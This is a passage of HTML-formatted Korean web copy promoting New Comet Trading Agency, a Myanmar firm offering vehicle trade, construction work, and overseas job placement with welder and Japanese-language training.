lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img 